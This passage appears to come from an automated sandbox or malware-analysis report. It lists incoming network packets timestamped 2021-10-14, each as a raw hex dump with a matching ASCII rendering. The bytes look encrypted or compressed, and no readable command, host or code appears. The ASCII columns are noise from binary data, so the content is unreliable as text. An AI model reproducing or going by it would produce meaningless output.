73 dd 55 4e 87 f9 85 23 48 82 69 65 ed 45 28 1a 63 d5 ec 4c 7d c3 a7 9b a6 18 c6 84 46 3c 90 88 87 09 eb df 9e b5 79 01 f7 Data Ascii: g!< gY0+aDhvn\z{V!8'9rph!%Za8$1SB8ep1PHyyX(.4Rp(^,PaZq=j-VhN}0I0'T1HwAxe@N{n7 %7jsUN#HieE(cL}F<y
2021-10-14 02:15:48 UTC	43	IN	Data Raw: bb df 98 98 55 91 6d 2c 6e 21 47 cb 90 dc 77 3f 33 98 ca 4e 6b 89 46 17 6f c1 32 f1 9c be c5 dc 8d f1 8b 97 8b 39 9b a7 e8 90 e9 e0 a4 66 1d fb 05 33 9e 55 09 70 ee 48 10 0f e2 bd 54 0c 4f 00 13 62 92 76 8b 2f 8c f1 87 9d 20 db 12 fa de a6 81 59 6a cd 64 47 f5 8e 48 a8 b9 bf 55 06 84 9a e0 5d 34 88 88 5c ca 54 b1 75 1a 51 d0 2f ab 50 c0 f4 3e 4a ff c6 d3 22 f6 ad 33 fc 08 c6 08 9c bd eb 61 fa f7 99 80 a8 05 6d 9e c6 c6 39 fd 3b c7 83 b9 35 65 06 17 fe 1e 37 d5 db 69 cd 2c 48 48 ba 7f 97 dd 2c 52 2a ec b7 77 34 62 96 0c b6 b7 9a 30 d0 b4 1c 55 76 8a 0c d2 40 57 91 0b 63 fe f6 f5 64 77 2d 7d e0 9d 7b 2a 1a 23 ba 29 1a fa a3 92 3f 7c 04 66 24 da d6 42 c8 60 fd b6 d7 26 78 73 33 27 ec c9 53 d5 f9 c9 d3 36 b6 7f 9d cf a7 e3 dd 83 9c 72 29 67 40 4f a8 9d 38 2f Data Ascii: Um,n!Gw?3NkFo29f3UpHTObv/ YjdGHU]4\TuQ/P>J"3am9;5e7i,HH,Rw4b0Uv@Wcdw-}{#)?\|f$B`&xs3'S6r)g@O8/
2021-10-14 02:15:48 UTC	44	IN	Data Raw: 81 8f 99 e2 4b dd eb 0d 0a bc 37 c6 52 d7 02 7d b5 36 5e 6a 0e 26 ce c2 ab cb 4a fe c6 94 2a 8d d0 19 c3 33 88 0a 91 f2 1b 3e e1 25 54 32 b1 08 f7 61 77 93 f1 15 5b 85 3c 2a cd 78 be 75 18 30 c1 0c 0c 40 40 fe 28 5d 71 01 8e 0b a9 e5 07 cd 67 b9 dc be 25 ac 0e 1f bc 81 29 9a 37 0c de 1d a1 c1 fb fb 72 d5 75 f1 2f f8 1c 8d ba a0 06 db 29 cd ec fc cb dd 79 6c 3f 01 31 2c 72 08 88 30 a2 90 0e 53 48 db f9 b2 d3 d9 01 38 e6 1c e3 27 78 95 0a 01 95 0d 9b 88 2a ca 71 02 0a df a0 a7 6e 3a 24 2f e7 ce a8 58 d9 44 d2 2b 32 66 79 4e 6b 4b 80 4a ce 40 f9 a9 ac 5f 93 97 31 e6 0c 2b c9 fb 3f c1 ba a1 37 b7 5b e6 fc 7b 20 18 55 46 a0 e8 d4 81 28 ec cf 60 7f 67 80 c5 6f 51 1d de 26 fe 6d 57 28 5c ab 55 75 be be 95 62 2b dc db 2c 8f 08 36 b6 19 f9 3f 6a a7 27 9a 2e 99 f6 Data Ascii: K7R}6^j&J3>%T2aw[<xu0@@(]qg%)7ru/)yl?1,r0SH8'x*qn:$/XD+2fyNkKJ@_1+?7[{ UF(`goQ&mW(\Uub+,6?j'.
2021-10-14 02:15:48 UTC	45	IN	Data Raw: 43 f0 b6 ad df 77 f1 e9 31 1c c6 0f 62 66 d6 88 58 22 f6 37 81 dd 55 f4 75 52 96 ca fe 0b e8 a8 95 04 1f 26 6c 6d e2 a1 ef bb da 8e b0 7b 8b 6d 26 79 df 46 ab bc e8 66 38 1f 90 e7 09 6a b3 49 06 66 df 3e d9 ff a7 c5 da e3 68 ba 90 8d 40 00 a7 e8 fa f8 e7 9d c7 0e f1 3b 26 95 44 0f 58 70 43 0f 13 31 ff 69 1d 61 5f a9 62 98 5a 99 2a 84 dd bb c6 76 d8 12 f6 e5 ba 90 54 71 d8 0e 70 e0 9d 44 b9 a5 a4 40 78 5e 99 cc 52 1d 5c 9b 54 a5 6d a1 66 16 40 cc 0d 8b 58 3e f3 7d 71 fb ee 76 25 e7 aa d0 cf 09 c6 03 a7 96 f6 6d ef ee 91 4f ad 3e bb a8 ea ca 35 c6 91 ee bb b3 26 69 c7 1e fc 18 20 12 c2 7e 22 21 75 4f 8b 83 41 bb d2 43 31 e4 71 0e f3 5b 84 1c a4 33 27 13 a5 40 e3 bb 7a bf 02 2c 41 7a 9c 0d 4b 5b f7 6b 6e f0 38 7d f2 86 68 2f 04 2c a9 0e 1b 2c 5d 8c 2d 98 05 Data Ascii: Cw1bfX"7UuR&lm{m&yFf8jIf>h@;&DXpC1ia_bZ*vTqpD@x^R\Tmf@X>}qv%mO>5&i ~"!uOAC1q[3'@z,AzK[kn8}h/,,]-
2021-10-14 02:15:48 UTC	47	IN	Data Raw: 11 04 4d ea 20 5f 8b 4e 26 10 0d 01 9b 51 45 58 7b ea 0b 69 59 2a 87 13 d6 07 e1 9c 03 5d 1b bf fa 98 cd 72 8b e2 8c 45 26 b9 8f 93 e2 bd e5 ec 27 01 72 37 c0 78 d6 14 7d 46 cf 5e 7f 14 53 bb c3 a5 e1 49 fe 9b 8f 1a 89 8e 90 c2 22 fb d3 91 f2 00 2b fb 73 c3 33 b1 06 f7 f8 76 93 f1 15 2c 86 3c 26 e8 69 94 cc 1e 5f 01 07 7f f0 9e f0 07 7f 41 6e 5d 01 a5 c7 2c c2 71 a0 0c 86 6e d3 22 1e ad 8a 10 83 af 1f dc 24 f6 ea ca fd 5a c6 5a f4 11 a5 db 8d ba bb dc a6 81 e4 db fa d8 d0 aa 56 22 29 06 26 ac 02 9d 12 8b b4 0e 53 42 06 ea b3 cf fb 10 31 d4 70 e0 26 7e fa bd 00 89 47 b6 83 08 c8 70 03 11 fe a7 8f b9 3b 24 25 d6 40 a9 49 a0 91 5e 2a 38 66 57 86 44 4a 86 5d e3 29 68 a9 aa 7d d9 92 27 f1 23 5c 43 fa 39 a8 6b 7b 24 ad 96 e1 e1 94 17 18 55 5d ab d1 e5 a9 49 e5 Data Ascii: M _N&QEX{iY]rE&'r7x}F^SI"+s3v,<&i_An],qn"$ZZV")&SB1p&~Gp;$%@I^8fWDJ])h}'#\C9k{$U]I
2021-10-14 02:15:48 UTC	48	IN	Data Raw: 33 95 34 93 fa 8b 4c 0b 46 49 11 ca 2c ae 32 7c 26 2a cc 9a 86 36 ef 43 b5 4d 4e 40 ba 73 cc a8 3f 19 5f e0 9f ca f7 b4 f6 53 fa a1 cb 7d f9 f0 ef 28 3b 9f 17 78 42 71 13 5b 28 dd 67 1a d6 7d 7d 5c ea 9c e7 ce 6b c2 bb 9d 16 f2 2b 6c 69 8d 3b 80 93 d2 98 9e 44 87 7c 27 00 05 45 cb 96 dc 7b 2e 39 de e9 4c 6b b5 52 1b 47 62 31 f1 9a cb ef de 8c e4 bd 81 87 40 80 a6 e8 fa 37 ef 90 58 39 f1 3d 3f 8e 58 21 48 ff 42 05 c7 1c ad 70 00 9f c3 a0 73 9a 66 b5 05 e7 0e 72 4a 7c 77 11 f0 f0 c4 05 58 60 d4 69 70 bc 9e 42 ae 80 2e 4a 17 70 b3 50 54 0c 5b a2 c9 ca 4b a9 09 a5 50 c1 2f db dc 3f f5 18 4c 96 66 71 23 fc c8 36 d6 08 cc 1a 8a 90 5a 6e e9 fb ea 15 a3 1b 99 97 fb cf 17 4e 9f c6 89 9b 89 60 19 18 c5 8f 37 c4 db 5a af 2d 64 56 9d ea bf 44 27 3d 95 f2 a7 17 8d cd Data Ascii: 34LFI,2\|&*6CMN@s?_S}(;xBq[(g}}\k+li;D\|'E{.9LkRGb1@7X9=?X!HBpsfrJ\|wX`ipB.JpPT[KP/?Lfq#6ZnN`7Z-dVD'=
2021-10-14 02:15:48 UTC	49	IN	Data Raw: e7 09 57 79 57 44 66 8e 38 bc 0e f6 d5 0c 9f 42 56 2e bb 9b a3 74 a3 64 15 2a 18 a8 15 2e 41 43 79 de 6b 62 ca 03 f7 2e 68 a7 68 5b ed 4f 7f e6 68 22 01 0f 16 a7 99 5e 59 7d 8f 33 73 71 ea 80 18 02 3f 5d 6a 3a 4f 03 4b ff 8f be 50 92 8d dd 4e 0e 8b 53 82 ec 49 e5 eb 0c 28 62 37 c2 78 2a 12 d0 1c 37 50 6a 0e 53 bb c0 be 08 4b 5d bb 8d 14 89 d0 90 c2 31 88 f0 93 8a 1b 22 f3 0d ef 32 b1 19 ef e5 74 db f6 3d 7f ef 3c 20 d1 6e 86 41 33 30 c7 06 6c fc 51 f8 34 41 ea 7f 5b 1c bf 73 05 c4 69 bc 4e 97 6e b4 18 83 bc 88 22 82 31 0e dc 17 b3 75 db fd 6e c9 c4 e5 11 d7 0b 11 ab b7 1c be 38 dd ea e5 d1 cc 3b 6f 1c 36 0c 3a ee 13 9d 27 81 be 92 42 44 19 e0 a5 4f c8 16 20 c3 66 7c 36 78 e5 83 16 09 1a b0 92 1d de ec 13 0c c5 d7 a2 e4 3b 2e 28 81 57 c6 72 d2 2b 54 23 25 Data Ascii: WyWDf8BV.td.ACykb.hh[Oh"^Y}3sq?]j:OKPNSI(b7x7PjSK]1"2t=< nA30lQ4A[siNn"1un8;o6:'BDO f\|6x;.(Wr+T#%
2021-10-14 02:15:48 UTC	50	IN	Data Raw: 34 31 f5 6e f1 4f 73 c5 b4 5f 2f 05 26 a5 0b 22 eb a9 87 fc 82 03 34 06 e3 b5 44 e0 77 e0 a8 c2 04 29 61 39 3e d8 2e 50 f9 de b7 12 22 9e f2 40 c1 84 dd 67 84 9c 78 25 5b 6c 5b 80 34 e6 2f 09 de a8 8a e8 02 c3 6e bb 3a 6d 08 85 ef 3f c4 1b c1 9a ad 55 09 db de dd 27 65 00 9a 3c a3 08 f2 1d e6 3d fb 94 99 93 98 7f fd a2 84 fd b7 6e b4 b5 f1 02 92 32 62 92 29 6e dd eb 90 47 b4 4b 3e 63 f8 5b be 8f 9c eb b1 13 eb eb 88 f3 37 97 5b d4 cf f4 14 2e 55 73 42 2f 5f 88 10 8b 1f e2 ce 32 f7 67 5f f3 1f f6 87 76 b2 66 2c ab 09 bb 70 18 4b 52 77 99 8c 63 ca 03 ce f0 41 1b 61 73 20 21 55 ee 07 e8 11 0b 0d a0 f0 4f 70 e1 85 21 61 71 3a 83 18 0e 01 c3 a5 33 70 1c b3 e2 4c d7 52 89 e2 9c 5f 08 96 55 80 fa 70 ee d3 34 02 62 37 d1 70 fe d0 7e b5 30 76 ab 0d 53 bd d3 b5 f9 Data Ascii: 41nOs_/&"4Dw)a9>.P"@gx%[l[4/n:m?U'e<=n2b)nGK>c[7[.UsB/_2g_vf,pKRwcAas !UOp!aq:3pLR_Up4b7p~0vS
2021-10-14 02:15:48 UTC	51	IN	Data Raw: 43 fa 39 c1 bc 71 4b bf 49 ef ce ad 2e 77 92 57 a7 f3 e7 04 b7 10 30 b8 06 fc 8f b0 52 42 17 ce 0d e3 75 71 3f 64 ab 53 1b 5b e8 95 64 32 0b 14 3f be de 00 a7 1f 8d bf 67 d4 97 8c 06 bd fd 4a cc 7d 38 8e 27 81 4a fa 84 43 6f fc 4f 7b 07 4b a2 ed 4c 7b eb 69 9a a6 12 b4 ac 6e 44 2f 89 81 66 65 de 9e bf 68 0b e5 25 9f 13 a6 26 6b e9 42 12 87 66 09 fa 08 05 1f f4 91 02 83 7a c9 44 3f 31 70 32 b3 0b e9 30 0a 6c 68 37 c9 d4 04 31 e9 cf f7 85 3a 41 f4 91 99 23 42 07 d1 b9 25 44 a2 8a 26 6f 53 7a 06 dd b8 2f b5 34 9a da 72 8b c9 50 4b 5e f9 47 62 6f ce e8 8c 40 e2 3b 63 0d 33 ff a0 0a 06 53 5d 19 cc 46 39 cd 7d 0c 0b cd 89 89 3d 88 b6 da c4 45 5f ac 48 e8 b8 39 02 54 ff e7 2c 19 b4 f0 4a d8 65 c3 55 7c 90 c7 f1 17 d7 0c 5b be ff 12 51 0a d4 58 0b d6 59 ed 54 f9 Data Ascii: C9qKI.wW0RBuq?dS[d2?gJ}8'JCoO{KL{inD/feh%&kBfzD?1p20lh71:A#B%D&oSz/4rPK^Gbo@;c3S]F9}=E_H9T,JeU\|[QXYT
2021-10-14 02:15:48 UTC	52	IN	Data Raw: ed 65 37 c4 c0 01 89 2d 64 56 bf 01 83 44 2d 58 08 2b a4 1d e4 5d fa 30 b6 bd 9a 01 c4 b8 17 99 63 94 02 2c 9f 6f a5 25 7c 5b f7 ff 7d ff 97 76 c8 a4 68 2f 0f f1 a0 22 1a eb d7 b1 22 82 0f 62 f5 e1 b5 46 df 0f df a8 c4 26 74 6a 56 89 f1 37 58 f4 d1 cb da 34 8d f5 a6 0d a1 f5 50 95 92 63 25 e9 47 5e fe 02 38 2f 05 dc 70 95 e8 04 d2 6b 95 1e 71 2a 8f f6 4a f9 1b c0 90 be 63 21 d5 93 dd 23 6e 06 b2 e7 bb 38 fd 72 b0 3e fb 9e 81 81 98 6e 95 77 92 fc bd 6e d9 2d e0 04 b0 e5 1f 01 2f 01 65 f9 95 33 ee 58 3e 67 cb 5f bb 9e 9c ce 64 38 2b ee e7 47 1e 0c 51 a0 d7 dc 88 35 46 71 43 23 5f 84 b6 0d 08 38 ec 19 f0 61 7f 3f ba e5 8f 5e 43 62 04 38 1a b2 09 29 41 43 79 a2 47 71 c0 14 e3 12 9e 1b 6b 5d 84 08 57 e4 6e 35 1a 1a 0c dc d2 44 58 7b 94 2b 7a 50 43 a7 1a 08 14 Data Ascii: e7-dVD-X+]0c,o%\|[}vh/""bF&tjV7X4Pc%G^8/pkq*Jc!#n8r>nwn-/e3X>g_d8+GQ5FqC#_8a?^Cb8)ACyGqk]Wn5DX{+zPC
2021-10-14 02:15:48 UTC	54	IN	Data Raw: a5 56 c9 70 08 1c 54 8c 8c e4 3b 22 0d 14 40 a9 52 bc 0d 5c 2a 34 47 62 e9 6e 63 6a 5a cb 38 05 34 ac 55 8a bd 02 e6 0d 55 44 d2 d3 c4 ad 7d 31 b1 60 ab c5 bc 2a 0f cf 7f 4c fa dd af 5c f9 e7 22 11 ed 8b d3 f3 2d 31 cd 21 e9 75 79 62 b2 a8 53 1c 5b 95 97 64 3e d1 db 2c f4 ee 36 a7 15 96 a6 05 60 2d 8c 0c 8d 3d 9c 0b 82 e6 92 e8 89 39 eb 83 69 6e d0 43 2b 39 3e 99 ef 4c 7a 84 67 9a a6 18 0b bc 66 53 45 9b 89 77 7b cf 97 31 df 34 9f db 60 ec 78 33 48 c1 75 12 49 6d 1a fd af be 1f f4 8e 09 ab 42 d3 44 35 ee 61 04 9c 0c c2 31 0a 2d 32 37 c9 c7 12 22 ec a1 05 85 3a 0b f5 80 9c 9e bd 06 fd aa 33 4e bc 99 23 6f 42 7f 1c 23 b9 05 ba 22 98 76 ba 8b c9 93 5d 84 ea 56 6f 74 dd f7 8c 51 e6 3b ad 09 1f 92 8a 4c 1a 35 58 19 cc 30 9d 33 7c 2a 33 ed 65 83 27 e1 55 a4 f8 Data Ascii: VpT;"@R\4GbncjZ84UUD}1`L\"-1!uybS[d>,6`-=9inC+9>LzgfSEw{14`x3HuImBD5a1-27":3N#oB#"v]VotQ;L5X03\|*3e'U
2021-10-14 02:15:48 UTC	55	IN	Data Raw: b6 5f 3e f3 7d 71 fb ee 76 3c d3 b4 ad d7 19 d4 16 98 46 f5 41 f8 ec 95 fe 6b 1b 93 95 f2 f4 5c d4 9f c6 9c ab 35 71 19 0f ff 0b 25 3a d0 5e 2a 3c 6e 4a 2f 57 bf 40 2d 54 36 db 89 1d e2 40 83 4d 16 bc 90 2c dc ad 0f 56 7c 84 10 33 63 85 81 21 46 4a ff e4 68 94 b5 7f e0 9a 77 0c 16 3e a9 32 08 f4 bd 73 23 ae 03 61 33 fd a0 53 da 60 f3 ba dd d2 79 4e 30 4b 4a 37 52 f3 d2 c2 c7 30 9e e9 8c d0 bf 0b 51 a8 96 63 38 64 82 48 90 21 27 3c 1d f4 b8 84 f3 fc c2 42 b7 44 e2 2a 85 eb 36 c2 07 d3 88 ad 74 1b d8 98 23 28 53 09 a2 d0 46 c7 04 02 09 2c e9 94 e4 81 85 90 8f 34 8f ec b9 4c 77 27 f1 08 95 20 0f 13 29 7f c5 e7 b5 c7 9b 66 35 14 f2 4e bc 89 89 ee a7 1a 38 fa 88 e4 0d 13 52 2a c4 f0 8f 38 46 74 4e 21 5d 9e 38 ab 0d f5 3a 1e dc 62 4c 3d af f4 96 64 bc 7d fa 3f Data Ascii: _>}qv<FAk\5q%:^<nJ/W@-T6@M,V\|3c!FJhw>2s#a3S`yN0KJ7R0Qc8dH!'<BD6t#(SF,4Lw' )f5N8R*8FtN!]8:bL=d}?
2021-10-14 02:15:48 UTC	56	IN	Data Raw: 02 a8 ae d4 36 95 37 da a7 74 16 38 0d 3d 62 98 b3 32 8e a8 08 3c bc 06 ec b9 c2 d2 01 2f d9 a6 7a 0f 75 fe 8d 06 fa f5 b6 8d 18 97 5c 77 1b c5 b5 9f 7f 2d 35 2e 99 50 33 37 1a 2b 5e 20 25 b6 3e 17 6b 4b 8c 4a ce 2f 61 b8 bc 42 56 0b 31 e6 00 55 51 ed e9 5d c2 b2 24 a7 42 f7 1e d3 cf 18 55 5d b4 ff ae 8b 4b ef c9 75 01 fc 84 aa a0 42 17 c5 3b de 4a 6e 5b 57 c4 7b 18 34 b9 84 75 29 d1 a5 0e 99 f6 31 b6 0e 96 a9 05 81 2f 8c 00 a6 e7 4a f8 79 38 82 96 a9 4e d0 85 6f 7e ed 20 22 32 4b a8 fe 5c 6c 3d 23 8a b7 02 c6 ba 50 59 6c 77 7e 77 7a c9 48 ac 61 1a ec 34 8c 2d 05 db 92 16 9c 07 6c 4f 3e fa dc 0e 0c e6 f7 b8 83 7a d9 49 17 08 63 02 bc d5 ea 37 20 65 2c 37 88 d9 12 22 ec f7 05 85 1b 41 f4 80 59 3c bc 06 1b be 33 4e a9 99 23 6f 58 7f 1c 22 a2 33 bd 22 1b b7 Data Ascii: 67t8=b2</zu\w-5.P37+^ %>kKJ/aBV1UQ]$BU]KuB;Jn[W{4u)1/Jy8No~ "2K\l=#PYlw~wzHa4-lO>zIc7 e,7"AY<3N#oX"3"
2021-10-14 02:15:48 UTC	57	IN	Data Raw: 31 87 2c 50 b5 54 da 03 f5 de eb 81 59 66 d3 68 70 01 9e 42 ae 80 51 49 17 7c b3 91 54 0c 57 99 58 c3 63 45 65 10 57 e9 c2 b7 5b 38 dd 4f 5b f9 e8 63 25 ff 8f 57 d4 08 c0 21 66 bb f4 6b c1 a0 99 91 a4 08 9b 96 c2 d6 3b d5 99 ee 9e b7 26 65 31 43 ed 14 31 d7 d6 7b 1b 33 60 5c b3 57 a0 40 2d 54 08 ae a7 1d e4 46 84 05 9e 93 92 2c c5 a8 34 6a 7c 95 08 3a 6f 28 f3 2f 49 5b f1 e6 67 ea 98 6c e4 b4 8d 2c 05 2a b8 25 32 cc a9 8d 28 ed 2d 48 2d e4 a4 49 d9 68 8d 8c c6 2c 7e 73 30 29 f7 58 74 fb d8 de c5 2b b6 d8 9a cf a7 9a 7a 86 9c 74 2e 62 5d 34 98 3f 38 25 d1 fb 8c be df 02 c3 64 ae 30 59 12 85 e1 2f 1a 1b 1e 8f 88 4d 3e c7 92 d7 3a 74 73 20 3d b8 32 f0 35 3a 3f fb 9e 2b 91 9e 44 89 32 84 fd bd 25 fe 26 f1 02 98 3e 1c ba 29 6e d7 bc 95 39 9a b5 3e 67 d0 43 bc Data Ascii: 1,PTYfhpBQI\|TWXcEeW[8O[c%W!fk;&e1C1{3`\W@-TF,4j\|:o(/I[gl,*%2(-H-Ih,~s0)Xt+zt.b]4?8%d0Y/M>:ts =25:?+D2%&>)n9>gC
2021-10-14 02:15:48 UTC	59	IN	Data Raw: d6 be 57 76 64 42 1b 81 06 15 c2 7b bb d4 5c 7f 77 11 30 bc 89 10 08 ad 1f d0 13 b5 c1 23 fa 72 d5 8e eb 2e 97 c7 9e bf b9 13 ad 8c 26 ed fa d2 56 f8 7e 1a 28 2e 1f 73 02 91 34 9b ae 19 85 51 00 fd b5 c2 d0 2e 01 31 8f 1f 2f 56 66 8d 00 9f 01 68 9f 3a ff 70 02 00 e6 8a 8d e5 3d 2e 0d b0 40 a9 52 0d 2b 58 00 32 6c 10 e4 6b 4b 86 59 cb 3e 6a a9 ac 55 fa 90 27 f7 71 45 41 fa 2d c7 ad 7b 3e a7 48 ee df 8c 27 18 53 56 a7 f9 a3 a9 49 fe cd 6c 12 fb ee 24 68 42 1d d0 7e dc 6c 7d 5d 30 a3 52 1a 3e b5 93 4c a4 d7 ca 20 b3 90 36 a7 15 8a df 4c a6 2d 86 15 b1 e7 64 e0 55 10 80 f9 85 5b 5d 84 69 6f fd 5c 32 22 43 b4 91 28 7b eb 34 38 b7 1a c3 b9 46 8c 92 88 8b 77 75 ca b6 96 6c 0b e3 32 12 14 a6 26 6c fa 4a 03 41 71 1e 76 57 04 1f f5 26 13 8b 6e c7 6c f7 31 63 08 a7 Data Ascii: WvdB{\w0#r.&V~(.s4Q.1/Vfh:p=.@R+X2lkKY>jU'qEA-{>H'SVIl$hB~l}]0R>L 6L-dU[]io\2"C({48Fwul2&lJAqvW&nl1c
2021-10-14 02:15:48 UTC	60	IN	Data Raw: 0b a7 c5 da a4 cc b9 90 8d 07 7d a6 e8 fa c1 7c b5 70 04 e2 39 33 b5 a5 0a 70 f9 6a 21 1b 1c ba 50 f2 48 d0 a2 4a 0e 77 a3 31 9f f6 8b 9d c3 d9 12 f6 de 99 83 59 66 f6 84 59 e2 97 6a 34 a8 b5 40 04 7f 8a ca 7c 22 53 8a 5a dc 63 8d 66 10 5b d7 db b5 4a 39 dd 3c 59 f9 e8 66 0b d8 a7 bf dd 1e 38 08 d0 94 f3 79 e5 20 3e 91 a2 1b 82 99 c2 e4 3d d5 99 d0 ab 9d 26 63 13 08 c3 54 44 e6 d3 72 35 3e 6c 4d bd 57 e8 46 2d 54 4f db a5 1d e4 5b 9d 1c b0 d2 b4 2e c3 b8 0d 4c 6d 91 2a 2e 40 7b 86 62 6d 59 f7 f3 7f f3 b9 3e e4 9c 6e 40 2f 2e a9 25 1d fa a1 e2 3a 83 05 40 f3 b7 c6 62 ca 60 e4 bb cd 3d 71 4a 6e 3a f0 31 3d d1 da d8 d2 33 97 e9 99 a0 85 f7 50 82 8d 7b 39 76 7c 59 81 3e 3e 40 29 f6 a9 90 f9 0b eb 2d b9 3a 77 45 af e3 25 c2 1c d1 93 c2 7d 08 c7 98 03 3c 5a 28 Data Ascii: }\|p93pj!PHJw1YfYj4@\|"SZcf[J9<Yf8y >=&cTDr5>lMWF-TO[.Lm*.@{bmY>n@/.%:@b`=qJn:1=3P{9v\|Y>>@)-:wE%}<Z(
2021-10-14 02:15:48 UTC	61	IN	Data Raw: ef 8d 1a 8f c1 9d d3 37 e7 4d 93 f2 0c 30 f0 0a 80 14 b3 02 d9 fe 79 bb be 39 7f 83 53 0a c2 71 90 ca 09 3d a8 1f 7e fa 4a 20 37 72 5e 59 5d 0b a3 fc 1a b1 cb aa d2 8c 65 85 36 1f ad 84 e6 ad bc 0e cd da b6 f8 db ea 63 cd d6 43 28 12 e3 72 45 a0 04 bf 72 df ea eb de cb b7 40 91 d7 f9 d3 ac 17 be 10 bd a8 0e 59 51 09 9f 09 d3 d9 1a 32 e6 48 e0 27 74 24 8f 06 bf 02 9c 8d 12 89 44 02 0a ce a4 8f e5 fe 24 25 88 9d a9 58 d3 89 5f 2a 32 79 51 f8 6b 51 86 59 ca 3e 6a a9 ac 07 80 91 27 70 0a 44 41 23 3e c7 ad 6e 24 a7 48 f5 c4 bc 21 0b 65 54 a7 0e dd a9 49 6b cf 66 01 fb 92 c3 51 88 17 cf 21 ef 75 79 57 a1 aa 7f 16 25 bb 9c 0b d9 d6 ca 20 97 e8 24 a1 1f 96 aa 75 ad d3 8d 2a be ff 73 f1 4f de 9b f2 90 4a d0 92 6f 77 02 4e 16 3a 63 8c ed 4c 7d e0 29 89 a0 12 c6 ab Data Ascii: 7M0y9Sq=~J 7r^Y]e6cC(rEr@YQ2H't$D$%X_2yQkQY>j'pDA#>n$H!eTIkfQ!uyW% $usOJowN:cL})
2021-10-14 02:15:48 UTC	63	IN	Data Raw: 23 18 e0 b9 01 01 e6 3a 5d f7 9c 32 ef 27 c1 9f 86 4a fa f1 3d 68 3e 4e eb 33 cd 77 3f af a0 c8 51 61 93 fa 17 6f ce ae e0 9b bb ce fc 6a e2 bb 90 17 3e 9f b8 e4 ef ba 7c a4 77 11 fc 22 4f 01 44 0e 6f f1 62 9a 19 1c bc e4 06 4e cf a7 7d ee eb b2 3c 93 e1 9b 29 45 dd 0d e1 e0 2b 90 5e 7f cc 77 c4 f3 9a 5d bb be 29 5b 10 65 8f da c8 1d 56 95 49 dc d7 b2 61 0f 47 e1 da b4 5b 3e 69 03 5c e6 f9 66 bf e7 a0 a0 cf 1e 5a 18 88 a7 ed 4d 69 fd 99 91 3e 0a 94 80 f0 dc a3 c4 98 d9 98 a5 ba 72 1e 01 f1 02 ab d5 d6 6d 2e 0d e4 5c b5 7f 23 55 2a 4d 3e d3 27 1d e2 4a 09 1c b1 a2 8f 3a 5f af 1b 5b 5c b5 fd 2c 41 7b 1c 1c 4c 44 d6 e3 f2 ea 96 62 c2 8a f4 3e 02 33 8a 35 86 fa ae 92 06 a2 85 4a 2d e2 29 51 cf 7f c7 be 58 3d 7f 7d 1f 18 70 37 52 f9 44 c9 d3 3d b9 ee 02 de a6 Data Ascii: #:]2'J=h>N3w?Qaoj>\|w"ODobN}<)E+^w])[eVIaG[>i\fZMi>rm.\#U*M>'J:_[\,A{LDb>35J-)QX=}p7RD=
2021-10-14 02:15:48 UTC	64	IN	Data Raw: 3e 75 43 b1 e9 97 d1 e0 88 e2 80 ec 1f 98 96 ed d4 63 e5 e1 25 59 66 37 c6 17 66 13 7d bf 94 4f 73 02 5b a8 d3 a8 c2 5a c6 19 8d 1a 89 c1 81 d3 23 12 64 98 cb c6 23 fd 0d e6 5d 00 03 df e5 67 80 e1 2e 6d bd 8d 22 c0 71 87 df 09 22 5d 14 7b f3 51 fa 4d e7 77 6e 57 18 ac 9c 75 c3 71 a0 c1 80 79 a8 26 45 a9 8e 3e fb 1f 1e da 06 b1 17 cb ed 8c de 49 f1 3f 91 19 8d bc de b0 a9 a4 c6 f8 04 d9 cc 59 7f 0b 2c 2e 70 76 02 9d 57 38 a9 0e 59 56 f8 ed a5 2d d8 70 2e cb 58 bd 23 7e fc e2 b2 94 0b bc 99 ec c9 66 fc 0b ae b5 8a cd 65 20 25 8e 2f 1b 59 d3 21 4a d4 33 7a af f9 0b 14 bf 4f c9 3e 6a da 8e 57 80 97 34 fd 11 c9 54 fa 3f c6 be 61 35 bd 5e c7 9f b8 20 1e f7 46 bd ee f5 f5 4d ef c9 c4 01 f7 99 ed 34 46 17 c9 83 fe 7e 66 62 01 af 53 1c 96 ae 8f 77 31 ff e4 28 9b Data Ascii: >uCc%Yf7f}Os[Z#d#]g.m"q"]{QMwnWuqy&E>I?Y,.pvW8YV-p.X#~fe %/Y!J3zO>jW4T?a5^ FM4F~fbSw1(
2021-10-14 02:15:48 UTC	65	IN	Data Raw: aa 69 49 0e 2e d2 44 e7 e3 49 dd ad e1 44 e1 ba cb 44 7c 6b c7 4b 12 d7 00 5b 4e fe 12 51 80 e1 52 1c 0a 46 f8 4c e0 87 d4 c9 f9 e8 37 2a 06 d0 10 6b 76 97 3b 61 0c c1 9c 16 e2 9c b7 3f 70 32 4b e0 8f dc 73 2e 3f b9 de 45 f1 9b 29 13 6f c8 1a d5 9c a4 cf 7e 9d e9 ac 46 98 24 89 ab ff 26 fa ec a4 7c 1f ee 0c ee ee ba 08 70 f5 51 06 08 18 af 59 01 5a f0 90 d0 97 77 a3 2a ad e0 ad 2f 47 cf 03 e5 ef a0 98 2a 90 df 61 52 f1 8c 53 b9 bc 9d cb 15 7a 9d da d9 0b 51 8a 5d de 5f b7 4e b3 51 c1 2f 9c 01 3e f5 18 d7 c6 ee 70 22 e5 b5 ae c5 1f 4a 36 8f b8 f5 45 45 fd 99 9b 8a 41 93 9f e0 dd e9 58 b4 c6 83 b2 35 6d 0f 0d e0 02 24 d7 f9 5c 31 2d 62 4f ba 69 ac 50 5e 70 22 f3 a1 0e f2 5b 84 19 9e d6 94 2c c5 a7 91 43 7c 95 03 3f 63 6a a2 1b 5a 55 df e4 6e fb 9b df f1 be Data Ascii: iI.DIDD\|kK[NQRFL7kv;a?p2Ks.?E)o~F$&\|pQYZw/G*aRSzQ]_NQ/>p"J6EEAX5m$\1-bOiP^p"[,C\|?cjZUn
2021-10-14 02:15:48 UTC	66	IN	Data Raw: b4 3a 9d 12 a1 c5 33 e5 6b 20 52 ea 94 67 99 92 79 7c db 5e 1d 22 6c cd c8 4e 7b ed 21 94 b1 9f d0 ad 6e 45 80 aa 90 44 65 cf 89 33 57 0b e5 24 3d 02 84 32 45 59 42 12 43 4f 53 fa dc 0e 37 1e 85 02 89 52 07 45 3f 3a 4b 26 b6 0b e2 5e 22 6e 06 31 d8 d2 05 f4 ff e0 14 8b 2d cc f3 80 9c 3f af 20 ec 9a 25 5f ab 15 1c 6f 42 7e be 32 9f 17 92 92 98 b5 b1 94 e9 d6 63 84 ea 42 79 5c 72 ed 8c 5b cb 0f 8c 02 08 77 8c 4c 1a 41 4b 3a cc 60 31 22 6b ac 06 c5 8b 81 85 f6 7a ce ec ff 40 bc 6a d8 c6 b5 37 57 f9 f1 55 de 46 f1 40 fa 8a 9e aa 89 0e f8 31 05 c6 11 60 